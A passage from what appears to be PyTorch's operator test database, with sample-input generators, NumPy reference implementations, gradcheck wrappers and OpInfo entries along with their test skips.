dict(keepdim=True)), (shape, dict(p=5.0)), (shape, dict(p=-1.0)), (shape, dict(eps=1.0)), ] return [ SampleInput(make(shape), args=(make(shape),), kwargs=kwargs) for shape, kwargs in shapes_and_kwargs ] def sample_inputs_pixel_shuffle(op_info, device, dtype, requires_grad, **kwargs): return [ SampleInput( make_tensor((1, 9, 2, 2), device=device, dtype=dtype, requires_grad=requires_grad), kwargs=dict(upscale_factor=upscale_factor), ) for upscale_factor in (1, 3) ] def sample_inputs_pixel_unshuffle(op_info, device, dtype, requires_grad, **kwargs): return [ SampleInput( make_tensor((1, 1, 6, 6), device=device, dtype=dtype, requires_grad=requires_grad), kwargs=dict(downscale_factor=downscale_factor), ) for downscale_factor in (1, 3) ] def sample_inputs_binary_cross_entropy(op_info, device, dtype, requires_grad, logits=False, **kwargs): make = partial(make_tensor, device=device, dtype=dtype) make_prob = partial(make, low=0, high=1) reductions = ("mean", "sum", "none") shapes_and_kwargs = [ *[(shape, None) for shape in ((), (1,), (S,), (S, S), (S, S, S))], *[((S, S), dict(reduction=reduction)) for reduction in reductions], *[((S, S), dict(reduction=reduction, weight=make((S, S)))) for reduction in reductions], ] if logits: shapes_and_kwargs.extend( [((S, S), dict(reduction=reduction, pos_weight=make((S,), low=0))) for reduction in reductions] ) for shape, kwargs in shapes_and_kwargs: yield SampleInput( (make if logits else make_prob)(shape, requires_grad=requires_grad), args=(make_prob(shape, requires_grad=requires_grad),), kwargs=kwargs, ) def sample_inputs_allclose(op_info, device, dtype, requires_grad, **kwargs): samples = [] sample_shapes = [(), (S), (S, S, S)] atols = [1e-2, 1e-16] rtols = [1e-1, 0.5] eps = 1e-8 for s, rtol, atol in product(sample_shapes, rtols, atols): # close sample t = make_tensor(s, device=device, dtype=dtype, requires_grad=requires_grad) close = (t + atol).detach().requires_grad_(requires_grad) close_sample = SampleInput(t, args=(close,), kwargs=dict(rtol=rtol, atol=atol)) samples.append(close_sample) # random sample a = make_tensor(s, device=device, dtype=dtype, requires_grad=requires_grad) b = make_tensor(s, device=device, dtype=dtype, requires_grad=requires_grad) r_sample = SampleInput(a, args=(b,), kwargs=dict(rtol=rtol, atol=atol)) samples.append(r_sample) return samples def sample_inputs_l1_loss(op_info, device, dtype, requires_grad, **kwargs): yield from sample_inputs_loss(op_info, device, dtype, requires_grad, **kwargs) # In addition to the regular test cases, we add two for mixed floating point and complex inputs if dtype.is_complex: make = partial(make_tensor, (), device=device, requires_grad=requires_grad) yield SampleInput(make(dtype=dtype), args=(make(dtype=torch.double),)) yield SampleInput(make(dtype=torch.double), args=(make(dtype=dtype),)) def sample_inputs_smooth_l1_loss(op_info, device, dtype, requires_grad, **kwargs): yield from sample_inputs_loss(op_info, device, dtype, requires_grad, **kwargs) make = partial(make_tensor, (S, S), device=device, dtype=dtype, requires_grad=requires_grad) # This test case always triggers the smooth condition, since absolute difference of input and target # is smaller than beta yield SampleInput(make(low=0, high=2), args=(make(low=-2, high=0),), kwargs=dict(beta=5)) yield SampleInput(make(), args=(make(),), kwargs=dict(beta=0)) def sample_inputs_kl_div(op_info, device, dtype, requires_grad, **kwargs): make = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes_and_reduction = [ ((2,), 
"mean"), ((2, 3), "mean"), ((2, 3, 4), "mean"), ((2,), "none"), ((2,), "batchmean"), ((2,), "sum"), ] sample_inputs = [] for (shape, reduction), log_target in itertools.product(shapes_and_reduction, (True, False)): # input should be log-probability, i.e. lie in (-inf, 0] input = make(shape, low=None, high=0) # target should be a probability by default, i.e. lie in [0, 1], and a log-probability if log_target is set, # i.e. lie in (-inf, 0] target = make(shape, low=None, high=0) if log_target else make(shape, low=0, high=1) sample_inputs.append( SampleInput(input, args=(target,), kwargs=dict(reduction=reduction, log_target=log_target)) ) return sample_inputs def sample_inputs_pdist(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield from (SampleInput(make_input((n, m))) for n, m in itertools.product((1, S), repeat=2)) yield from (SampleInput(make_input((S, S)), kwargs=dict(p=p)) for p in (0.0, 1.0, 2.0, 10.0, float("inf"))) def reference_pdist(input, p=2): pdist = scipy.spatial.distance.pdist if p == 0: output = pdist(input, "hamming") * input.shape[1] elif p == float("inf"): output = pdist(input, lambda x, y: np.abs(x - y).max()) else: output = pdist(input, "minkowski", p=p) return output.astype(input.dtype) def sample_inputs_diagflat(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return [ SampleInput(make_input(())), SampleInput(make_input((2,))), SampleInput(make_input((2, 2))), SampleInput(make_input((2,)), kwargs=dict(offset=1)), SampleInput(make_input((2,)), kwargs=dict(offset=-1)), ] def sample_inputs_max_unpool(op_info, device, dtype, requires_grad, **kwargs): unpool_name_to_pool_method_dict = { 'nn.functional.max_unpool1d': torch.nn.functional.max_pool1d, 'nn.functional.max_unpool2d': torch.nn.functional.max_pool2d, 'nn.functional.max_unpool3d': torch.nn.functional.max_pool3d } unpool_name_to_dim = { 'nn.functional.max_unpool1d': 1, 'nn.functional.max_unpool2d': 2, 'nn.functional.max_unpool3d': 3 } unpool_to_pool_name_dict = dict(( (k, f'nn.functional.{v.__name__}') for k, v in unpool_name_to_pool_method_dict.items() )) pool_dim = unpool_name_to_dim[op_info.name] pool_method = unpool_name_to_pool_method_dict[op_info.name] pool_op_info = copy.copy(op_info) pool_op_info.name = unpool_to_pool_name_dict[op_info.name] for sample in sample_inputs_max_pool(pool_op_info, device, dtype, requires_grad, **kwargs): # shapes (C, ...) 
        # do not work as of now; see https://github.com/pytorch/pytorch/issues/68337
        # TODO: remove once the issue is resolved
        if sample.input.dim() != pool_dim + 2:
            continue

        # No dilation > 1 for max_unpool;
        # see https://github.com/pytorch/pytorch/issues/68420
        if sample.kwargs['dilation'] != 1:
            continue

        # Can't unpool without indices
        if sample.kwargs['return_indices']:
            pool, indices = pool_method(sample.input, **sample.kwargs)
            # arg has to be a leaf
            arg = pool.detach().requires_grad_(requires_grad)
            sample_kwargs = {
                'kernel_size': sample.kwargs['kernel_size'],
                'stride': sample.kwargs['stride'],
                'padding': sample.kwargs['padding'],
                # output_size could be None, but we specify it explicitly
                # to compensate for the information lost in pool due
                # to the floor/ceil operation used to compute the shapes
                'output_size': sample.input.size()
            }

            yield SampleInput(arg, args=(indices,), kwargs=sample_kwargs)


def sample_inputs_max_unpool_grad(op_info, device, dtype, requires_grad, **kwargs):
    for sample in sample_inputs_max_unpool(op_info, device, dtype, requires_grad, **kwargs):
        indices = sample.args[0]
        # The samples for max_unpool are generated with max_pool.
        # It could be that a single element from the max_pool's
        # input is mapped to several locations in its output.
        # This situation leads to failed gradchecks because
        # the finite-difference algorithm perturbs the elements
        # of the output one by one, and not in equivalence classes
        # determined by whether two elements in the output come
        # from the same location in the input (simply put, whether
        # they have the same corresponding index).
        # So, there are two ways to resolve this issue:
        # 1. Extract a perturbation for one element and apply it to all
        #    the elements from the same equivalence class, or
        # 2. Make sure that the equivalence classes are all singletons,
        #    i.e. the index tensor has to be comprised of only unique
        #    indices.
        # Here we go with solution 2, the easiest of all.
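        # For example, indices [[0, 1], [1, 2]] has 3 unique values out of 4 and is
        # filtered out, while [[0, 1], [2, 3]] has all-unique indices and is kept.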
if indices.unique().numel() == indices.numel(): yield sample foreach_unary_op_db: List[OpInfo] = [ ForeachFuncInfo('exp'), ForeachFuncInfo('acos'), ForeachFuncInfo('asin'), ForeachFuncInfo('atan'), ForeachFuncInfo('cos'), ForeachFuncInfo('cosh'), ForeachFuncInfo('log'), ForeachFuncInfo('log10'), ForeachFuncInfo('log2'), ForeachFuncInfo('tan'), ForeachFuncInfo('tanh'), ForeachFuncInfo('sin'), ForeachFuncInfo('sinh'), ForeachFuncInfo( 'neg', dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex(), sample_inputs_func=sample_inputs_foreach, ), ForeachFuncInfo( 'sqrt', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half), ), ForeachFuncInfo( 'ceil', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'erf', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'erfc', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'expm1', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'floor', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'log1p', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), ), ForeachFuncInfo( 'round', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'frac', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'reciprocal', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), ), ForeachFuncInfo( 'sigmoid', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), ), ForeachFuncInfo( 'trunc', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'abs', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half), dtypesIfCUDA=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), ] foreach_binary_op_db: List[OpInfo] = [ ForeachFuncInfo( "add", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_alpha_param=True, ), ForeachFuncInfo( "sub", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_alpha_param=True, ), ForeachFuncInfo( "mul", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), skips=( # Ref: https://github.com/pytorch/pytorch/issues/77946 DecorateInfo(unittest.skip("Unable to reproduce failure locally"), "TestForeach", "test_binary_op_scalarlist_fastpath", device_type='cuda', dtypes=(torch.float16,)), ) ), ForeachFuncInfo( "div", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), skips=( # Ref: https://github.com/pytorch/pytorch/issues/77946 DecorateInfo(unittest.skip("Unable to reproduce failure locally"), 
"TestForeach", "test_binary_op_scalarlist_fastpath", device_type='cuda', dtypes=(torch.float16,)), ) ), ] foreach_pointwise_op_db: List[ForeachFuncInfo] = [ ForeachFuncInfo( "addcmul", dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( "addcdiv", dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16), ), ] foreach_minmax_op_db: List[ForeachFuncInfo] = [ ForeachFuncInfo( "maximum", dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=all_types_and(torch.float16, torch.bool), ), ForeachFuncInfo( "minimum", dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=all_types_and(torch.float16, torch.bool), ), ] foreach_reduce_op_db: List[ForeachFuncInfo] = [ ForeachFuncInfo( "norm", dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.bfloat16), ), ] def reference_sign(x): if x.dtype == np.bool_: # `np.sign` doesn't support `bool`. # >>> np.sign(True) # ufunc 'sign' did not contain a loop # with signature matching types dtype('bool') -> dtype('bool') return np.sign(x, dtype=np.uint8).astype(np.bool_) return np.sign(x) def reference_sgn(x): # NumPy doesn't have an equivalent to `torch.sgn` when the dtype is complex. # For complex inputs, `np.sign` returns sign(x.real) + 0j if x.real != 0 else sign(x.imag) + 0j. # while `torch.sgn` returns, 0 if abs(input) == 0 else input/abs(input) if x.dtype not in [np.complex64, np.complex128]: return reference_sign(x) out = (x / np.abs(x)) if out.ndim == 0: # Handle x == 0 case if (x == 0): # Can't assign to np.complex object # So make a new one. return np.array(complex(0, 0), dtype=x.dtype) return out # Handle x == 0 case mask = (x == 0) out[mask] = complex(0, 0) return out def reference_sigmoid(x): # 'scipy.special.expit' not supported for the input types if x.dtype in [np.complex64, np.complex128]: return (1 / (1 + np.exp(-x))) return scipy.special.expit(x) def reference_logsigmoid(x): return np.where( x < 0, x - np.log1p(np.exp(x)), -np.log1p(np.exp(-x))) def reference_hardsigmoid(x): intermediate = x / 6 + 0.5 y = np.clip(intermediate, 0, None) return np.where(y > 1, 1, y).astype(x.dtype) def reference_lgamma(x): # scipy.special.gammaln returns `-inf` when input is `-inf`. # While Pytorch, C and C++, all return `inf` when input is `-inf`. # Reference: # https://en.cppreference.com/w/cpp/numeric/math/lgamma # https://en.cppreference.com/w/c/numeric/math/lgamma # To handle the above discrepancy, # we replace -inf with inf so values # that were originally -inf map to inf as expected if x.dtype.kind == 'f': x = np.where(x == float('-inf'), np.array(float('inf'), dtype=x.dtype), x) out = scipy.special.gammaln(x) if x.dtype == np.float16: # `scipy.special.gammaln` returns output of float32 when input is float16, # while `torch.lgamma` preserves `float16`. But due to smaller range of float16, # Pytorch version outputs `inf` while SciPy returns finite values. 
out = out.astype(np.float16) return out def reference_polygamma(x, n): # WEIRD `scipy.special.polygamma` behavior # >>> scipy.special.polygamma(0, np.array(501, dtype=np.float32)).dtype # dtype('float64') # >>> scipy.special.polygamma(0, np.array([501], dtype=np.float32)).dtype # dtype('float32') # # Thus we cast output to the default torch dtype or preserve double result_dtype = torch_to_numpy_dtype_dict[torch.get_default_dtype()] if x.dtype == np.double: result_dtype = np.double return scipy.special.polygamma(n, x).astype(result_dtype) def reference_mvlgamma(x, d): if x.dtype == np.float16: return scipy.special.multigammaln(x, d).astype(np.float16) return scipy.special.multigammaln(x, d) def reference_softplus(input, beta=1, threshold=20): non_linear = input * beta <= threshold output = input.copy() output[non_linear] = np.log(1 + np.exp(beta * input[non_linear])) / beta return output def reference_gelu(X, *, approximate='none'): def _gelu_ref(X): return X * stats.norm.cdf(X) def _tanh_gelu_ref(X): M_SQRT_2_PI = math.sqrt(2 / math.pi) Z = M_SQRT_2_PI * (X + 0.044715 * np.power(X, 3.0)) return 0.5 * X * (1.0 + np.tanh(Z)) if approximate == 'tanh': return _tanh_gelu_ref(X) else: return _gelu_ref(X) def reference_one_hot(a: np.ndarray, num_classes: int = -1) -> np.ndarray: if num_classes == -1: num_classes = int(np.amax(a) + 1) idcs = a.reshape(-1) + np.arange(0, a.size, dtype=np.int64) * num_classes one_hot = np.zeros((a.size, num_classes), dtype=a.dtype) np.put(one_hot, idcs, 1) return one_hot.reshape(*a.shape, -1) def reference_mse_loss(input, target, reduction="mean"): se = (input - target) ** 2 if reduction == "mean": return np.mean(se) elif reduction == "sum": return np.sum(se) else: # reduction == "none" return se def wrapper_set_seed(op, *args, **kwargs): """Wrapper to set seed manually for some functions like dropout See: https://github.com/pytorch/pytorch/pull/62315#issuecomment-896143189 for more details. """ with freeze_rng_state(): torch.manual_seed(42) return op(*args, **kwargs) def reference_layer_norm(inp: np.ndarray, normalized_shape: Tuple[int], weight=None, bias=None, eps=1e-5): feature_size = np.prod(normalized_shape) inp_view = inp.reshape(-1, feature_size) # type: ignore[call-overload] mean = inp_view.mean(axis=-1, keepdims=True) var = inp_view.var(axis=-1, ddof=0, keepdims=True) Y = (inp_view - mean) / np.sqrt(var + eps) if weight is None and bias is not None: Y = Y + bias.reshape(-1) elif weight is not None and bias is None: Y = Y * weight.reshape(-1) elif weight is not None and bias is not None: Y = Y * weight.reshape(-1) + bias.reshape(-1) return Y.reshape(*inp.shape) def reference_group_norm(inp: np.ndarray, num_groups: int, weight=None, bias=None, eps=1e-5): inp_view = inp if np.prod(inp.shape) != 0: inp_view = inp.reshape((inp.shape[0], num_groups, -1)) mean = inp_view.mean(axis=-1, keepdims=True) var = inp_view.var(axis=-1, ddof=0, keepdims=True) Y = (inp_view - mean) / np.sqrt(var + eps) Y = Y.reshape(inp.shape) if weight is not None: # weight is a vector of length equal to the channel if len(Y.shape) > 2: weight = np.tile(np.expand_dims(weight, 1), [1] + list(inp.shape[2:])) Y = Y * weight if bias is not None: # bias is a vector of length equal to the channel if len(Y.shape) > 2: bias = np.tile(np.expand_dims(bias, 1), [1] + list(inp.shape[2:])) Y = Y + bias return Y # using a custom reference function since numpy only has a string side arg (instead of right and side) and doesn't # have an out_int32 arg. 
# Additionally, numpy doesn't support searchsorted with ND arrays, so this splits those into
# stacked 1D cases
def reference_searchsorted(sorted_sequence, boundary, out_int32=False, right=False, side='left', sorter=None):
    side = 'right' if (right or side == 'right') else 'left'
    if len(sorted_sequence.shape) == 1:
        ret = np.searchsorted(sorted_sequence, boundary, side=side, sorter=sorter)
        return ret.astype(np.int32) if out_int32 else ret
    elif sorted_sequence.shape[0] == 0:
        if sorter is not None:
            sorter = sorter.flatten()
        ret = np.searchsorted(sorted_sequence.flatten(), boundary.flatten(), side=side, sorter=sorter)
        ret = ret.astype(np.int32) if out_int32 else ret
        return ret.reshape(boundary.shape)
    else:
        # numpy searchsorted only supports 1D inputs, so we split up ND inputs
        orig_shape = boundary.shape
        num_splits = np.prod(sorted_sequence.shape[:-1])
        splits = range(0, num_splits)
        sorted_sequence, boundary = sorted_sequence.reshape(num_splits, -1), boundary.reshape(num_splits, -1)
        if sorter is not None:
            sorter = sorter.reshape(num_splits, -1)

        split_sequence = [sorted_sequence[i] for i in splits]
        split_boundary = [boundary[i] for i in splits]
        split_sorter = [sorter[i] if (sorter is not None) else None for i in splits]

        split_ret = [np.searchsorted(s_seq, b, side=side, sorter=s_sort)
                     for (s_seq, b, s_sort) in zip(split_sequence, split_boundary, split_sorter)]
        split_ret = [i.astype(np.int32) for i in split_ret] if out_int32 else split_ret
        return np.stack(split_ret).reshape(orig_shape)


def gradcheck_wrapper_hermitian_input(op, input, *args, **kwargs):
    """Gradcheck wrapper for functions that take Hermitian matrices as input.

    They require a modified function because the finite-difference algorithm
    for calculating derivatives does not preserve the Hermitian property of the input.
    """
    return op(input + input.mH, *args, **kwargs)


def gradcheck_wrapper_triangular_input(op, *args, upper=False, idx=0, **kwargs):
    """Gradcheck wrapper for functions that take lower or upper triangular matrices as input.

    They require a modified function because the finite-difference algorithm
    for calculating derivatives does not preserve the triangular property of the input.
    `idx` is used to specify which `args[idx]` is to be triangularized.
    """
    triangular_arg = args[idx].triu() if upper else args[idx].tril()
    return op(*args[:idx], triangular_arg, *args[idx + 1:], upper, **kwargs)


def gradcheck_wrapper_triangular_input_real_positive_diagonal(op, *args, upper=False, idx=0, **kwargs):
    """Gradcheck wrapper for functions that take lower/upper triangular matrices
    with real and positive diagonals, for example, cholesky-like operations.
    """
    arg = args[idx]
    arg_diag = arg.diagonal(0, -2, -1)
    arg_diag_embed = torch.diag_embed(arg_diag)
    id_diag_tensor = torch.ones_like(arg_diag)
    id_tensor = torch.diag_embed(id_diag_tensor)
    # new_arg = arg - diag(arg) + I
    new_arg = arg - arg_diag_embed + id_tensor
    return gradcheck_wrapper_triangular_input(
        op, *args[:idx], new_arg, *args[idx + 1:], upper=upper, idx=idx, **kwargs
    )


def gradcheck_wrapper_masked_operation(op, input, *args, **kwargs):
    """Gradcheck wrapper for masked operations.

    When mask is specified, replaces masked-out elements with zeros.

    Use for operations that produce non-finite masked-out elements,
    for instance, for minimum and maximum reductions.
""" output = op(input, *args, **kwargs) mask = kwargs.get('mask') if mask is not None: output_mask = torch._masked._output_mask(op, input, *args, **kwargs) output = torch.where(output_mask, output, output.new_zeros([])) return output def reference_reduction_numpy(f, supports_keepdims=True): """Wraps a NumPy reduction operator. The wrapper function will forward dim, keepdim, mask, and identity kwargs to the wrapped function as the NumPy equivalent axis, keepdims, where, and initiak kwargs, respectively. Args: f: NumPy reduction operator to wrap supports_keepdims (bool, optional): Whether the NumPy operator accepts keepdims parameter. If it does not, the wrapper will manually unsqueeze the reduced dimensions if it was called with keepdim=True. Defaults to True. Returns: Wrapped function """ @wraps(f) def wrapper(x: np.ndarray, *args, **kwargs): # Copy keys into a set keys = set(kwargs.keys()) dim = kwargs.pop('dim', None) keepdim = kwargs.pop('keepdim', False) if 'dim' in keys: dim = tuple(dim) if isinstance(dim, Sequence) else dim # NumPy reductions don't accept dim=0 for scalar inputs # so we convert it to None if and only if dim is equivalent if x.ndim == 0 and dim in {0, -1, (0,), (-1,)}: kwargs['axis'] = None else: kwargs['axis'] = dim if 'keepdim' in keys and supports_keepdims: kwargs['keepdims'] = keepdim if 'mask' in keys: mask = kwargs.pop('mask') if mask is not None: assert mask.layout == torch.strided kwargs['where'] = mask.cpu().numpy() if 'identity' in keys: identity = kwargs.pop('identity') if identity is not None: if identity.dtype is torch.bfloat16: identity = identity.cpu().to(torch.float32) else: identity = identity.cpu() kwargs['initial'] = identity.numpy() if 'unbiased' in keys: unbiased = kwargs.pop('unbiased') if unbiased is not None: kwargs['ddof'] = int(unbiased) result = f(x, *args, **kwargs) # Unsqueeze reduced dimensions if NumPy does not support keepdims if keepdim and not supports_keepdims and x.ndim > 0: dim = list(range(x.ndim)) if dim is None else dim result = np.expand_dims(result, dim) return result return wrapper def loss_reference_reduction_wrapper(fn): def wrapper(input, target, *, size_average=None, reduce=None, reduction="mean", **other_kwargs): if size_average is not None or reduce is not None: raise RuntimeError( "The keyword arguments 'size_average' and 'reduce' are deprecated and not supported by this wrapper" ) output = fn(input, target, **other_kwargs) if reduction == "mean": return np.mean(output) elif reduction == "sum": return np.sum(output) else: # reduction == "none" return output return wrapper @loss_reference_reduction_wrapper def reference_smooth_l1_loss(input, target, beta=1.0): diff = input - target abs_diff = np.abs(diff) above_threshold = abs_diff >= beta loss = np.empty_like(input) loss[above_threshold] = abs_diff[above_threshold] - 0.5 * beta loss[~above_threshold] = diff[~above_threshold] ** 2 / (2 * beta) return loss def reference_std_var(f): """Forwards unbiased/correction kwargs as NumPy's equivalent ddof""" g = reference_reduction_numpy(f) @wraps(g) def wrapper(x: np.ndarray, *args, **kwargs): assert not ('unbiased' in kwargs and 'correction' in kwargs) if 'unbiased' in kwargs: kwargs['ddof'] = int(kwargs.pop('unbiased')) elif 'correction' in kwargs: kwargs['ddof'] = kwargs.pop('correction') return g(x, *args, **kwargs) return wrapper def generate_std_var_kwargs(t: torch.Tensor, **kwargs): """Generates unbiased/correction kwargs for std/var operators""" yield ((), {'unbiased': True}) yield ((), {'unbiased': False}) # Currently, 
calling std with correction is only enabled when # both dim and keepdim are provided. if 'dim' in kwargs and 'keepdim' in kwargs: yield ((), {'correction': 0}) yield ((), {'correction': 1}) numel = torch.tensor(t.shape)[kwargs.get('dim')].prod() yield ((), {'correction': numel // 2}) def error_inputs_mean(op_info, device, **kwargs): err_msg1 = (r"mean\(\): could not infer output dtype. " r"Input dtype must be either a floating point or complex dtype. " r"Got: Long") si1 = SampleInput( make_tensor((3, 4, 5), dtype=torch.int64, device=device), args=([],)) err_msg2 = (r"mean\(\): could not infer output dtype. " r"Optional dtype must be either a floating point or complex dtype. " r"Got: Long") si2 = SampleInput( make_tensor((3, 4, 5), dtype=torch.float32, device=device), args=([],), kwargs={"dtype": torch.int64}) err_msg3 = "Expected out tensor to have dtype double, but got float instead" si3 = SampleInput( make_tensor((3, 4, 5), dtype=torch.int64, device=device), args=([],), kwargs={ "dtype": torch.float64, "out": make_tensor([], dtype=torch.float32, device=device), }) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2), ErrorInput(si3, error_regex=err_msg3)) # Operator database (sorted alphabetically) op_db: List[OpInfo] = [ UnaryUfuncInfo('abs', aliases=('absolute', ), ref=np.abs, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), skips=( # Inplace abs doesn't support complex inputs DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_grad', dtypes=(torch.cdouble,)), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_gradgrad', dtypes=(torch.cdouble,)), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD', dtypes=(torch.cdouble,)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat]), # Reference: https://github.com/pytorch/pytorch/issues/49224 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.int8], active_if=TEST_WITH_ASAN), # TODO: Fix test_out_arg_all_dtypes as torch.empty_like(expected_output) where expected_output=op(input) # We can break the logic of the loop over all possible types but it is OK. 
# https://github.com/pytorch/pytorch/blob/master/test/test_unary_ufuncs.py#L440-L449 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_out_arg_all_dtypes', dtypes=[torch.cfloat, torch.cdouble]), # The complex formula might be wrong DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', dtypes=complex_types()), # Forward-over-reverse gradgrad might be wrong for complex (see above): DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=complex_types()), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # add_out_op2_sparse_csr DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), ), supports_fwgrad_bwgrad=True, assert_autodiffed=True, supports_sparse_csr=True, supports_forward_ad=True), # NOTE: CPU complex acos produces incorrect outputs (https://github.com/pytorch/pytorch/issues/42952) UnaryUfuncInfo('acos', aliases=('arccos', ), ref=np.arccos, domain=(-1, 1), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-1, torch.complex64: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Failing with wrong imaginary sign on at least some Windows jobs DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Failing with wrong imaginary sign on at least some Windows jobs DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_method_grad', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_inplace_grad', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_inplace_forward_mode_AD', dtypes=[torch.cdouble], active_if=IS_WINDOWS), )), # NOTE: the derivative for inplace acosh is not implemented UnaryUfuncInfo('acosh', aliases=('arccosh', ), 
